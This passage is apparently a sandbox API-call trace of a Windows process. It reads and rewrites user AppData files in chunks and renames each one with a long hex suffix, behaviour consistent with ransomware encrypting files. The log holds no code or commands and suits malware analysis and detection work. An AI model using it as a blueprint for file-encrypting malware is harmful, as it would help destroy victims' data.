lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.2FFBBC8527AAEB0677B791804128724AF2FE098B45397BEAB0077D77E1DB0057") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.2FFBBC8527AAEB0677B791804128724AF2FE098B45397BEAB0077D77E1DB0057" [0114.482] GetProcessHeap () returned 0x600000 [0114.482] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x240) returned 0x3160b30 [0114.482] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x27fff60, FileInformation=0x3160b30, Length=0x240, FileInformationClass=0xa) returned 0x0 [0114.483] CloseHandle (hObject=0x31c) returned 1 [0114.483] GetProcessHeap () returned 0x600000 [0114.483] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0114.485] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0114.798] WriteFile (in: hFile=0x214, lpBuffer=0x680470, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338) returned 0x0 [0114.802] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0114.820] ReadFile (in: hFile=0x32c, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0114.820] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0114.823] WriteFile (in: hFile=0x32c, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0114.824] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0114.824] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x27fff70) returned 0x0 [0114.825] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Settings\\settings.dat", lpString2=".1EE31164854615701EFACD409003DE41AC81838DBC09C85CF1B85FCCAB39F642" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Settings\\settings.dat.1EE31164854615701EFACD409003DE41AC81838DBC09C85CF1B85FCCAB39F642") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Settings\\settings.dat.1EE31164854615701EFACD409003DE41AC81838DBC09C85CF1B85FCCAB39F642" [0114.825] GetProcessHeap () returned 0x600000 [0114.825] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x192) returned 0x635998 [0114.825] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x27fff60, FileInformation=0x635998, Length=0x192, FileInformationClass=0xa) returned 0x0 [0114.825] CloseHandle (hObject=0x32c) returned 1 [0114.826] GetProcessHeap () returned 0x600000 [0114.826] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.827] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0115.001] WriteFile (in: hFile=0x324, lpBuffer=0x680470*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338) returned 1 [0115.004] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0115.124] WriteFile (in: hFile=0x320, lpBuffer=0x680470*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338) returned 1 [0115.129] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0115.279] ReadFile (in: hFile=0x324, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0115.282] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0115.285] WriteFile (in: hFile=0x324, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0115.286] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0115.286] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x27fff70) returned 0x0 [0115.287] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".95EA5265DB8FD65E7C00D9AE2ED236985BADDCD9135026B4AC41220E6A22F46E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Settings\\settings.dat.95EA5265DB8FD65E7C00D9AE2ED236985BADDCD9135026B4AC41220E6A22F46E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Settings\\settings.dat.95EA5265DB8FD65E7C00D9AE2ED236985BADDCD9135026B4AC41220E6A22F46E" [0115.287] GetProcessHeap () returned 0x600000 [0115.287] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x184) returned 0x318e2b0 [0115.287] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x27fff60, FileInformation=0x318e2b0, Length=0x184, FileInformationClass=0xa) returned 0x0 [0115.294] CloseHandle (hObject=0x324) returned 1 [0115.295] GetProcessHeap () returned 0x600000 [0115.295] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.296] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0115.402] ReadFile (in: hFile=0x32c, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0115.402] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0115.404] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x27fff70) returned 0x0 [0115.405] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".816AF497B0FFB24AF133B02DE19FD432D115160DEABB4961DC865564566CBD67" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.816AF497B0FFB24AF133B02DE19FD432D115160DEABB4961DC865564566CBD67") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.816AF497B0FFB24AF133B02DE19FD432D115160DEABB4961DC865564566CBD67" [0115.405] GetProcessHeap () returned 0x600000 [0115.405] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x208) returned 0x63e940 [0115.405] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x27fff60, FileInformation=0x63e940, Length=0x208, FileInformationClass=0xa) returned 0x0 [0115.406] CloseHandle (hObject=0x32c) returned 1 [0115.406] GetProcessHeap () returned 0x600000 [0115.406] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0115.408] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0115.485] ReadFile (in: hFile=0x324, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 0x0 [0115.499] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0115.562] ReadFile (in: hFile=0x214, lpBuffer=0x690478, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0115.564] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0115.573] NtQueryObject (in: Handle=0x214, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x27fff70) returned 0x0 [0115.574] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat", lpString2=".5E67EE99BD9F495438BB3BDDEBE9ABA18C214765E957E7105B9CB62AE7F00D51" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.5E67EE99BD9F495438BB3BDDEBE9ABA18C214765E957E7105B9CB62AE7F00D51") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.5E67EE99BD9F495438BB3BDDEBE9ABA18C214765E957E7105B9CB62AE7F00D51" [0115.574] GetProcessHeap () returned 0x600000 [0115.574] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x222) returned 0x6b3dc8 [0115.574] NtSetInformationFile (FileHandle=0x214, IoStatusBlock=0x27fff60, FileInformation=0x6b3dc8, Length=0x222, FileInformationClass=0xa) returned 0x0 [0115.575] CloseHandle (hObject=0x214) returned 1 [0115.576] GetProcessHeap () returned 0x600000 [0115.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0115.577] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0115.610] ReadFile (in: hFile=0x214, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0115.611] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0115.613] WriteFile (in: hFile=0x214, lpBuffer=0x31130f8, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 0x0 [0115.617] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0115.624] NtQueryObject (in: Handle=0x214, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x27fff70) returned 0x0 [0115.625] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Settings\\settings.dat", lpString2=".3DB7B41DF85D8E5E7F01A7B8C16F7BFBFF4BF593299F943FE04BEAF84DDE2B06" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Settings\\settings.dat.3DB7B41DF85D8E5E7F01A7B8C16F7BFBFF4BF593299F943FE04BEAF84DDE2B06") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Settings\\settings.dat.3DB7B41DF85D8E5E7F01A7B8C16F7BFBFF4BF593299F943FE04BEAF84DDE2B06" [0115.625] GetProcessHeap () returned 0x600000 [0115.625] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18e) returned 0x6b27a0 [0115.625] NtSetInformationFile (FileHandle=0x214, IoStatusBlock=0x27fff60, FileInformation=0x6b27a0, Length=0x18e, FileInformationClass=0xa) returned 0x0 [0115.626] CloseHandle (hObject=0x214) returned 1 [0115.627] GetProcessHeap () returned 0x600000 [0115.627] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.628] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0115.666] ReadFile (in: hFile=0x214, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0115.667] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0115.667] WriteFile (in: hFile=0x214, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0115.668] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0115.669] NtQueryObject (in: Handle=0x214, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x27fff70) returned 0x0 [0115.669] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".44E81167DE995CB5ECE000025473866CA32CAA00E48C992A3310942C8A297A3B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.44E81167DE995CB5ECE000025473866CA32CAA00E48C992A3310942C8A297A3B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.44E81167DE995CB5ECE000025473866CA32CAA00E48C992A3310942C8A297A3B" [0115.670] GetProcessHeap () returned 0x600000 [0115.670] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x20e) returned 0x6b3ff8 [0115.670] NtSetInformationFile (FileHandle=0x214, IoStatusBlock=0x27fff60, FileInformation=0x6b3ff8, Length=0x20e, FileInformationClass=0xa) returned 0x0 [0115.671] CloseHandle (hObject=0x214) returned 1 [0115.671] GetProcessHeap () returned 0x600000 [0115.671] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0115.673] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0115.701] ReadFile (in: hFile=0x32c, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0115.701] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0115.706] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x27fff70) returned 0x0 [0115.706] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".A5EEB91C2868342C2549FDC61741359BD2B0286A0FCD6E293B8C8ACA3DCAFF58" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Settings\\settings.dat.A5EEB91C2868342C2549FDC61741359BD2B0286A0FCD6E293B8C8ACA3DCAFF58") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Settings\\settings.dat.A5EEB91C2868342C2549FDC61741359BD2B0286A0FCD6E293B8C8ACA3DCAFF58" [0115.706] GetProcessHeap () returned 0x600000 [0115.706] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x188) returned 0x6b3460 [0115.706] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x27fff60, FileInformation=0x6b3460, Length=0x188, FileInformationClass=0xa) returned 0x0 [0115.707] CloseHandle (hObject=0x32c) returned 1 [0115.708] GetProcessHeap () returned 0x600000 [0115.708] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.709] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0115.784] ReadFile (in: hFile=0x324, lpBuffer=0x690478, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0115.785] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0115.814] ReadFile (in: hFile=0x214, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0115.816] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0115.819] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x27fff70) returned 0x0 [0115.820] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".2D7DB395E169CC426349EE5FD471E608C01444BEB9EC560A8EC8C7E3CCB8106B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.2D7DB395E169CC426349EE5FD471E608C01444BEB9EC560A8EC8C7E3CCB8106B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.2D7DB395E169CC426349EE5FD471E608C01444BEB9EC560A8EC8C7E3CCB8106B" [0115.820] GetProcessHeap () returned 0x600000 [0115.820] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x226) returned 0x31623b8 [0115.820] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x27fff60, FileInformation=0x31623b8, Length=0x226, FileInformationClass=0xa) returned 0x0 [0115.822] CloseHandle (hObject=0x324) returned 1 [0115.823] GetProcessHeap () returned 0x600000 [0115.823] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0115.826] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0115.901] WriteFile (in: hFile=0x32c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0115.905] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0116.022] WriteFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 0x0 [0116.027] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, 